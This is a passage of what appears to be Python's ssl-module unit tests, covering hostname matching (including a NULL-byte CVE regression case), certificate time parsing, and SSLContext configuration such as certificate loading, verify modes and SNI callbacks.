ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with ssl.wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 is the default value
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2,
ctx.options)
ctx.options |= ssl.OP_NO_SSLv3
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
self.assertEqual(0, ctx.options)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value by OpenSSL
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(SVN_PYTHON_ORG_ROOT_CERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
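# GetPassCallable checks that load_cert_chain() accepts both a callable
# instance and a bound method as the password callback.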
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but SVN_PYTHON_ORG_ROOT_CERT is a CA cert
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(SVN_PYTHON_ORG_ROOT_CERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
